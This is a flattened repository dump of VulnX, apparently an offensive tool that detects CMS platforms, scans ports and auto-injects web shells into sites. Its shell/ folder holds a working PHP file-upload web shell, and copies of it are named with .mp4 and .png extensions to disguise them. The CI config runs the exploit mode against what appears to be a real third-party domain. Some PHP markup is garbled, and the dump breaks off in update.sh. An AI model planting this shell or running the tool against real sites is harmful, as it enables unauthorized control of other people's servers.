├── CONTRIBUTING.md ├── shell ├── VulnX.txt ├── VulnX.html ├── VulnX.gif ├── VulnX.zip ├── __init__.py ├── VulnX.php ├── VulnX.php.mp4 └── VulnX.php.png ├── requirements.txt ├── bin ├── vulnxicon.png └── vulnx.desktop ├── common ├── __init__.py ├── uriParser.py ├── output_wr.py ├── colors.py ├── banner.py └── requestUp.py ├── modules ├── __init__.py ├── cli │ ├── __init__.py │ ├── helpers.py │ └── cli.py ├── dorks │ ├── __init__.py │ ├── helpers.py │ └── engine.py ├── executor │ ├── __init__.py │ ├── Magento.py │ ├── Lokomedia.py │ ├── Opencart.py │ ├── Lokomedia2.py │ ├── Drupal.py │ ├── Uknown.py │ ├── Prestashop.py │ ├── Joomla.py │ └── Wordpress.py ├── exploits │ ├── __init__.py │ ├── drupal_exploits.py │ ├── joomla_exploits.py │ ├── prestashop_exploits.py │ └── wordpress_exploits.py ├── gathering │ ├── __init__.py │ ├── cmsgather.py │ ├── joocms.py │ ├── wpcms.py │ └── host_gathering.py ├── scan_ports.py ├── dns_dump.py └── detector.py ├── docker ├── README ├── Dockerfile └── debian_stretch │ └── Dockerfile ├── .github ├── FUNDING.yml └── ISSUE_TEMPLATE │ ├── feature_request.md │ └── bug_report.md ├── .travis.yml ├── .gitignore ├── update.sh ├── CHANGELOG.md ├── install.sh ├── vulnx.py └── README.md /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shell/VulnX.txt: -------------------------------------------------------------------------------- 1 | Tig 2 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | -------------------------------------------------------------------------------- /shell/VulnX.html: -------------------------------------------------------------------------------- 1 | VulnX Uploading 2 | -------------------------------------------------------------------------------- /shell/VulnX.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anouarbensaad/vulnx/HEAD/shell/VulnX.gif -------------------------------------------------------------------------------- /shell/VulnX.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anouarbensaad/vulnx/HEAD/shell/VulnX.zip -------------------------------------------------------------------------------- /shell/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /bin/vulnxicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/anouarbensaad/vulnx/HEAD/bin/vulnxicon.png -------------------------------------------------------------------------------- /common/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/cli/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/dorks/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/executor/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/exploits/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /modules/gathering/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import (absolute_import, division, print_function) 2 | -------------------------------------------------------------------------------- /common/uriParser.py: -------------------------------------------------------------------------------- 1 | import re 2 | from urllib.parse import urlparse 3 | 4 | 5 | def parsing_url(url): 6 | host = urlparse(url).netloc 7 | return host 8 | -------------------------------------------------------------------------------- /docker/README: -------------------------------------------------------------------------------- 1 | ### Docker Documentation. 2 | Welcome to the vulnx DOCKER documentation. 3 | The vulnx DOCKER documentation is generated as a rule of usage docker. 4 | 5 | You can build docker-image & run container for no problem of comptability: 6 | $ docker build -t vulnx ./docker/ 7 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 8 | -------------------------------------------------------------------------------- /bin/vulnx.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=vulnx 3 | Comment=VulnX 🕷️ Cms and vulnerabilites detector, & An intelligent bot auto shell injector. 4 | Encoding=UTF-8 5 | Exec=sh -c "vulnx;${SHELL:-bash}" 6 | Icon=vulnxicon.png 7 | StartupNotify=false 8 | Terminal=true 9 | Type=Application 10 | Categories=02-Vulnerability-Analysis; 11 | X-Kali-Package=vulnx 12 | Name[C]=vulnx 13 | -------------------------------------------------------------------------------- /modules/exploits/drupal_exploits.py: -------------------------------------------------------------------------------- 1 | from common.colors import failexploit, vulnexploit, que, info, good 2 | from common.requestUp import getrequest as vxget 3 | from common.requestUp import sendrequest as vxpost 4 | import os 5 | import re 6 | import random 7 | import datetime 8 | import requests 9 | from common.uriParser import parsing_url as hostd 10 | now = datetime.datetime.now() 11 | year = now.strftime('%Y') 12 | month = now.strftime('%m') 13 | 14 | Session = requests.Session() 15 | -------------------------------------------------------------------------------- /common/output_wr.py: -------------------------------------------------------------------------------- 1 | 2 | import os 3 | import sys 4 | 5 | 6 | def writelogs(data, data_name, output_dir): 7 | """Write the results.""" 8 | for data, data_name in zip(data, data_name): 9 | if data: 10 | filepath = output_dir + '/' + data_name + '.txt' 11 | with open(filepath, 'w+') as out_file: 12 | joined = '\n'.join(data) 13 | out_file.write(str(joined.encode('utf-8').decode('utf-8'))) 14 | out_file.write('\n') 15 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [anouarbensaad] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 13 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | os: 3 | # os building 4 | - linux 5 | python: 6 | # version of python. 7 | - 3.6 8 | install: 9 | # install packages. 10 | - pip install -r ./requirements.txt 11 | before_script: 12 | - pip install flake8 13 | # stop the build if there are Python syntax errors or undefined names 14 | - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics 15 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 16 | - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 17 | script: 18 | # run this command to grabber all informations, and apply the vunerabilites search 19 | - python vulnx.py -u isetso.rnu.tn --cms all -t3 --web-info --exploit 20 | # show list dorks & search example for blaze dork 5 page of google search & output the results to logs/Dorks/getTime() 21 | - python vulnx.py -l all -D blaze -n 5 --output logs/ 22 | -------------------------------------------------------------------------------- /shell/VulnX.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo ''; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.mp4: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo ''; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /shell/VulnX.php.png: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Uname:".php_uname()."
"; 11 | echo ''; 12 | if(isset($_POST['Submit'])){ 13 | $filedir = ""; 14 | $maxfile = '2000000'; 15 | $mode = '0644'; 16 | $userfile_name = $_FILES['image']['name']; 17 | $userfile_tmp = $_FILES['image']['tmp_name']; 18 | if(isset($_FILES['image']['name'])) { 19 | $qx = $filedir.$userfile_name; 20 | @move_uploaded_file($userfile_tmp, $qx); 21 | @chmod ($qx, octdec($mode)); 22 | echo"
Uploaded Success ==> $userfile_name
"; 23 | } 24 | } 25 | else{ 26 | echo'

'; 27 | } 28 | echo ''; 29 | 30 | } 31 | ?> -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /modules/gathering/cmsgather.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | from common.colors import G,W 4 | def drupal_version(url,headers): 5 | response = requests.get(url, headers).text 6 | try: 7 | matches = re.compile(r'Drupal \d{0,10}').findall(response) 8 | if len(matches) > 0 and matches[0] != None and matches[0] != "": 9 | version = matches[0] 10 | print('%s [+] Drupal Version : %s %s' % (G, version, W)) 11 | except Exception as error_: 12 | print('Handling Error : ' + str(error_)) 13 | 14 | # Prestashop Version 15 | 16 | 17 | def prestashop_version(url,headers): 18 | response = requests.get(url, headers).text 19 | try: 20 | matches = re.compile(r'Prestashop \d{0,9}').findall(response.text) 21 | if len(matches) > 0 and matches[0] != None and matches[0] != "": 22 | version = matches[0] 23 | return print('%s [+] Prestashop Version : %s %s' % (G, version, W)) 24 | except Exception as error_: 25 | print('Handling Error : ' + str(error_)) 26 | -------------------------------------------------------------------------------- /common/colors.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Module Of Colors. 3 | OS : Ubuntu 4 | ''' 5 | 6 | import sys 7 | 8 | if sys.platform.lower().startswith(('os', 'win', 'darwin', 'ios')): 9 | # Colors shouldn't be displayed on Mac and Windows 10 | bannerblue = bannerblue2 = yellowhead = \ 11 | W = Y = R = G = B = bg = green = \ 12 | run = good = bad = info = red = end = que = \ 13 | failexploit = vulnexploit = portopen = portclose = '' 14 | else: 15 | # banner Colors 16 | bannerblue = '\033[1;0;34m' 17 | bannerblue2 = '\033[1;1;94m' 18 | yellowhead = '\033[1;1;94m' 19 | # default colors 20 | W = '\033[1;97m' # white 21 | Y = '\033[1;93m' # yellow 22 | R = '\033[1;91m' 23 | G = '\033[1;92m' 24 | B = '\033[1;94m' 25 | bg = '\033[7;91m' 26 | green = '\033[1;92m' 27 | # action colors 28 | run = '\033[1;93m[~]\033[1;97m' 29 | good = '\033[1;92m[+]\033[1;97m' 30 | bad = '\033[1;91m[-]\033[1;97m' 31 | info = '\033[1;93m[!]\033[1;97m' 32 | red = '\033[1;91m' 33 | end = '\033[1;0m' 34 | que = '\033[1;94m[?]\033[1;97m' 35 | # test colors 36 | failexploit = '\033[91mFAIL\033[1m' 37 | vulnexploit = '\033[92mVULN\033[1m' 38 | portopen = '\033[92mOPEN \033[1m' 39 | portclose = '\033[91mCLOSE\033[1m' 40 | -------------------------------------------------------------------------------- /modules/executor/Magento.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.gathering.host_gathering import GatherHost 7 | from modules.dns_dump import dnsdumper,domain_info 8 | from modules.scan_ports import ScanPort 9 | import sys 10 | 11 | 12 | class Magento(object): 13 | """ 14 | call it when target is a Magento cms. 15 | Usings method from other class. 16 | """ 17 | 18 | def __init__(self, url=None, headers=None, port=None): 19 | 20 | # init the url & headers. 21 | self.url = url 22 | self.headers = headers 23 | # port to scan 24 | self.port = port 25 | 26 | def exploit(self): 27 | return print('no exploits found.') 28 | 29 | def webinfo(self): 30 | web = GatherHost(self.url,self.headers) 31 | web.web_host() 32 | 33 | def serveros(self): 34 | os = GatherHost(self.url,self.headers) 35 | os.os_server() 36 | 37 | def cmsinfo(self): 38 | return print('no info to get.') 39 | 40 | def dnsdump(self): 41 | return dnsdumper(self.url) 42 | 43 | def domaininfo(self): 44 | return domain_info(self.url) 45 | 46 | def ports(self,port): 47 | self.port = port 48 | sp = ScanPort(self.url,self.port) 49 | sp.portscan() 50 | -------------------------------------------------------------------------------- /modules/executor/Lokomedia.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.gathering.host_gathering import GatherHost 7 | from modules.dns_dump import dnsdumper,domain_info 8 | from modules.scan_ports import ScanPort 9 | import sys 10 | 11 | 12 | class Lokomedia(object): 13 | """ 14 | call it when target is a lokomedia cms. 15 | Usings method from other class. 16 | """ 17 | 18 | def __init__(self, url=None, headers=None, port=None): 19 | 20 | # init the url & headers. 21 | self.url = url 22 | self.headers = headers 23 | # port to scan 24 | self.port = port 25 | 26 | def exploit(self): 27 | return print('no exploits found.') 28 | 29 | def webinfo(self): 30 | web = GatherHost(self.url,self.headers) 31 | web.web_host() 32 | 33 | def serveros(self): 34 | os = GatherHost(self.url,self.headers) 35 | os.os_server() 36 | 37 | def cmsinfo(self): 38 | return print('no info to get.') 39 | 40 | def dnsdump(self): 41 | return dnsdumper(self.url) 42 | 43 | def domaininfo(self): 44 | return domain_info(self.url) 45 | 46 | def ports(self,port): 47 | self.port = port 48 | sp = ScanPort(self.url,self.port) 49 | sp.portscan() 50 | -------------------------------------------------------------------------------- /modules/executor/Opencart.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.gathering.host_gathering import GatherHost 7 | from modules.dns_dump import dnsdumper,domain_info 8 | from modules.scan_ports import ScanPort 9 | import sys 10 | 11 | 12 | class Opencart(object): 13 | """ 14 | call it when target is a opencart cms. 15 | Usings method from other class. 16 | """ 17 | 18 | def __init__(self, url=None, headers=None, port=None): 19 | 20 | # init the url & headers. 21 | self.url = url 22 | self.headers = headers 23 | # port to scan 24 | self.port = port 25 | 26 | def exploit(self): 27 | return print('no exploits found.') 28 | 29 | def webinfo(self): 30 | web = GatherHost(self.url,self.headers) 31 | web.web_host() 32 | 33 | def serveros(self): 34 | os = GatherHost(self.url,self.headers) 35 | os.os_server() 36 | 37 | def cmsinfo(self): 38 | return print('no info to get.') 39 | 40 | def dnsdump(self): 41 | return dnsdumper(self.url) 42 | 43 | def domaininfo(self): 44 | return domain_info(self.url) 45 | 46 | def ports(self,port): 47 | self.port = port 48 | sp = ScanPort(self.url,self.port) 49 | sp.portscan() 50 | -------------------------------------------------------------------------------- /modules/executor/Lokomedia2.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.gathering.host_gathering import GatherHost 7 | from modules.dns_dump import dnsdumper,domain_info 8 | from modules.scan_ports import ScanPort 9 | import sys 10 | 11 | 12 | class Lokomedia2(object): 13 | """ 14 | call it when target is a lokomedia2 cms. 15 | Usings method from other class. 16 | """ 17 | 18 | def __init__(self, url=None, headers=None, port=None): 19 | 20 | # init the url & headers. 21 | self.url = url 22 | self.headers = headers 23 | # port to scan 24 | self.port = port 25 | 26 | def exploit(self): 27 | return print('no exploits found.') 28 | 29 | def webinfo(self): 30 | web = GatherHost(self.url,self.headers) 31 | web.web_host() 32 | 33 | def serveros(self): 34 | os = GatherHost(self.url,self.headers) 35 | os.os_server() 36 | 37 | def cmsinfo(self): 38 | return print('no info to get.') 39 | 40 | def dnsdump(self): 41 | return dnsdumper(self.url) 42 | 43 | def domaininfo(self): 44 | return domain_info(self.url) 45 | 46 | def ports(self,port): 47 | self.port = port 48 | sp = ScanPort(self.url,self.port) 49 | sp.portscan() 50 | -------------------------------------------------------------------------------- /modules/executor/Drupal.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.gathering.host_gathering import GatherHost 7 | from modules.gathering.cmsgather import drupal_version 8 | from modules.dns_dump import dnsdumper,domain_info 9 | from modules.scan_ports import ScanPort 10 | import sys 11 | 12 | 13 | class Drupal(object): 14 | """ 15 | call it when target is a drupal cms. 16 | Usings method from other class. 17 | """ 18 | 19 | def __init__(self, url=None, headers=None, port=None): 20 | 21 | # init the url & headers. 22 | self.url = url 23 | self.headers = headers 24 | # port to scan 25 | self.port = port 26 | 27 | def exploit(self): 28 | return print('no exploits found.') 29 | 30 | def webinfo(self): 31 | web = GatherHost(self.url,self.headers) 32 | web.web_host() 33 | 34 | def serveros(self): 35 | os = GatherHost(self.url,self.headers) 36 | os.os_server() 37 | 38 | def cmsinfo(self): 39 | drupal_version(self.url,self.headers) 40 | 41 | def dnsdump(self): 42 | return dnsdumper(self.url) 43 | 44 | def domaininfo(self): 45 | return domain_info(self.url) 46 | 47 | def ports(self,port): 48 | self.port = port 49 | sp = ScanPort(self.url,self.port) 50 | sp.portscan() 51 | -------------------------------------------------------------------------------- /modules/scan_ports.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from common.colors import que, portopen, portclose 7 | from common.uriParser import parsing_url as hostd 8 | import socket 9 | 10 | portsobject = { 11 | 21: 'FTP', 12 | 22: 'SSH', 13 | 23: 'Telnet', 14 | 25: 'SMTP', 15 | 43: 'Whois', 16 | 53: 'DNS', 17 | 68: 'DHCP', 18 | 80: 'HTTP', 19 | 110: 'POP3', 20 | 115: 'SFTP', 21 | 119: 'NNTP', 22 | 123: 'NTP', 23 | 139: 'NetBIOS', 24 | 143: 'IMAP', 25 | 161: 'SNMP', 26 | 220: 'IMAP3', 27 | 389: 'LDAP', 28 | 443: 'SSL', 29 | 1521: 'Oracle SQL', 30 | 2049: 'NFS', 31 | 3306: 'mySQL', 32 | 5800: 'VNC', 33 | 8080: 'HTTP', 34 | } 35 | 36 | class ScanPort(): 37 | def __init__(self,url,port): 38 | self.url = url 39 | self.port = port 40 | 41 | def portscan(self): 42 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | if self.port: 44 | result = sock.connect_ex((hostd(self.url), self.port)) 45 | if result == 0: 46 | print(' {} {} {} {}' 47 | .format(que, self.port, portopen, portsobject[self.port])) 48 | else: 49 | print(' {} {} {} {}' 50 | .format(que, self.port, portclose, portsobject[self.port])) 51 | -------------------------------------------------------------------------------- /modules/executor/Uknown.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from common.colors import bad 7 | from modules.gathering.host_gathering import GatherHost 8 | from modules.dns_dump import dnsdumper,domain_info 9 | from modules.scan_ports import ScanPort 10 | import sys 11 | 12 | 13 | class Uknown(object): 14 | """ 15 | call it when target is a uknown cms. 16 | Usings method from other class. 17 | """ 18 | 19 | def __init__(self, url=None, headers=None, port=None): 20 | 21 | # init the url & headers. 22 | self.url = url 23 | self.headers = headers 24 | # port to scan 25 | self.port = port 26 | 27 | def exploit(self): 28 | return print(' This is uknown cms error while scanning exploits from cms.') 29 | 30 | 31 | def webinfo(self): 32 | web = GatherHost(self.url,self.headers) 33 | web.web_host() 34 | 35 | def serveros(self): 36 | os = GatherHost(self.url,self.headers) 37 | os.os_server() 38 | 39 | def cmsinfo(self): 40 | return print(' This is uknown cms error while dumping info from cms.') 41 | 42 | def dnsdump(self): 43 | return dnsdumper(self.url) 44 | 45 | def domaininfo(self): 46 | return domain_info(self.url) 47 | 48 | def ports(self,port): 49 | self.port = port 50 | sp = ScanPort(self.url,self.port) 51 | sp.portscan() 52 | -------------------------------------------------------------------------------- /modules/executor/Prestashop.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.exploits.prestashop_exploits import PSExploits 7 | from modules.gathering.host_gathering import GatherHost 8 | from modules.gathering.cmsgather import prestashop_version 9 | from modules.dns_dump import dnsdumper,domain_info 10 | from modules.scan_ports import ScanPort 11 | import sys 12 | 13 | 14 | class Prestashop(object): 15 | """ 16 | call it when target is a prestashop cms. 17 | Usings method from other class. 18 | """ 19 | 20 | def __init__(self, url=None, headers=None, port=None): 21 | 22 | # init the url & headers. 23 | self.url = url 24 | self.headers = headers 25 | # port to scan 26 | self.port = port 27 | 28 | def exploit(self): 29 | ps = PSExploits(self.url, self.headers) 30 | return ps.psexploits() 31 | 32 | def webinfo(self): 33 | whg = GatherHost(self.url,self.headers) 34 | whg.web_host() 35 | 36 | def serveros(self): 37 | whg = GatherHost(self.url,self.headers) 38 | whg.os_server() 39 | 40 | def cmsinfo(self): 41 | prestashop_version(self.url,self.headers) 42 | 43 | def dnsdump(self): 44 | return dnsdumper(self.url) 45 | 46 | def domaininfo(self): 47 | return domain_info(self.url) 48 | 49 | def ports(self,port): 50 | self.port = port 51 | sp = ScanPort(self.url,self.port) 52 | sp.portscan() 53 | -------------------------------------------------------------------------------- /modules/executor/Joomla.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.exploits.joomla_exploits import JOOExploits 7 | from modules.gathering.host_gathering import GatherHost 8 | from modules.gathering.joocms import joo_version,joo_user,joo_template 9 | from modules.dns_dump import dnsdumper,domain_info 10 | from modules.scan_ports import ScanPort 11 | import sys 12 | 13 | 14 | class Joomla(object): 15 | """ 16 | call it when target is a joomla cms. 17 | Usings method from other class. 18 | """ 19 | 20 | def __init__(self, url=None, headers=None, port=None): 21 | 22 | # init the url & headers. 23 | self.url = url 24 | self.headers = headers 25 | # port to scan 26 | self.port = port 27 | 28 | def exploit(self): 29 | joox = JOOExploits(self.url, self.headers) 30 | return joox.jooexploits() 31 | 32 | def webinfo(self): 33 | web = GatherHost(self.url,self.headers) 34 | web.web_host() 35 | 36 | def serveros(self): 37 | os = GatherHost(self.url,self.headers) 38 | os.os_server() 39 | 40 | def cmsinfo(self): 41 | joo_version(self.url,self.headers) 42 | joo_user(self.url,self.headers) 43 | joo_template(self.url,self.headers) 44 | 45 | def dnsdump(self): 46 | return dnsdumper(self.url) 47 | 48 | def domaininfo(self): 49 | return domain_info(self.url) 50 | 51 | def ports(self,port): 52 | self.port = port 53 | sp = ScanPort(self.url,self.port) 54 | sp.portscan() 55 | -------------------------------------------------------------------------------- /modules/executor/Wordpress.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from modules.exploits.wordpress_exploits import WPExploits 7 | from modules.gathering.host_gathering import GatherHost 8 | from modules.gathering.wpcms import wp_plugin,wp_themes,wp_user,wp_version 9 | from modules.dns_dump import dnsdumper,domain_info 10 | from modules.scan_ports import ScanPort 11 | import sys 12 | 13 | 14 | class Wordpress(object): 15 | """ 16 | call it when target is a wordpress cms. 17 | Usings method from other class. 18 | """ 19 | 20 | def __init__(self, url=None, headers=None, port=None): 21 | 22 | # init the url & headers. 23 | self.url = url 24 | self.headers = headers 25 | # port to scan 26 | self.port = port 27 | 28 | def exploit(self): 29 | wpx = WPExploits(self.url, self.headers) 30 | return wpx.wpexploits() 31 | 32 | def webinfo(self): 33 | whg = GatherHost(self.url,self.headers) 34 | whg.web_host() 35 | 36 | def serveros(self): 37 | whg = GatherHost(self.url,self.headers) 38 | whg.os_server() 39 | 40 | def cmsinfo(self): 41 | wp_plugin(self.url,self.headers) 42 | wp_themes(self.url,self.headers) 43 | wp_user(self.url,self.headers) 44 | wp_version(self.url,self.headers) 45 | 46 | def dnsdump(self): 47 | return dnsdumper(self.url) 48 | 49 | def domaininfo(self): 50 | return domain_info(self.url) 51 | 52 | def ports(self,port): 53 | self.port = port 54 | sp = ScanPort(self.url,self.port) 55 | sp.portscan() 56 | -------------------------------------------------------------------------------- /docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | MAINTAINER BENSAAD Anouar bensaad.tig@gmail.com 3 | 4 | # Project Informations. 5 | LABEL name vulnx 6 | LABEL src "https://github.com/anouarbensaad/vulnx" 7 | LABEL creator anouarbensaad 8 | LABEL desc "Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector,\ 9 | fast cms detection of target and fast scanner and informations gathering like\ 10 | subdomains, \ 11 | ipaddresses,\ 12 | country, \ 13 | org, \ 14 | timezone, \ 15 | region, \ 16 | ans \ 17 | and more ...\ 18 | Instead of injecting shell and checking it works like all the other tools do,\ 19 | vulnx analyses the response with and recieve if shell success uploaded or no.\ 20 | vulnx is searching for urls with dorks." 21 | 22 | # Clonning Vulnx From Github 23 | RUN apk add --no-cache git && \ 24 | git clone https://github.com/anouarbensaad/vulnx.git 25 | 26 | # Make vulnx group 27 | RUN addgroup vulnx 28 | 29 | # added \\vulnx [group] secondary group to vulnx. 30 | RUN adduser -G vulnx -g "vulnx user" -s /bin/sh -D vulnx 31 | 32 | # change vulnx owner of directory of project. 33 | RUN chown -R vulnx vulnx 34 | 35 | # Switch user. 36 | USER vulnx 37 | 38 | ENV APP_HOME=vulnx 39 | 40 | # Working−Directory 41 | WORKDIR $APP_HOME 42 | 43 | # Install Pip Packages. 44 | RUN pip install --user --upgrade pip && \ 45 | pip install --user -r ./requirements.txt 46 | 47 | # Add Mount Volume Docker To Save All changes. 48 | VOLUME [ "/vulnx" ] 49 | 50 | # Entrypoint -> Command : While Creating Container. 51 | ENTRYPOINT [ "python", "vulnx.py" ] 52 | 53 | # Default Command When Starting The Container. 54 | CMD ["--help"] 55 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /update.sh: -------------------------------------------------------------------------------- 1 | red = "\e[0;31m" 2 | green 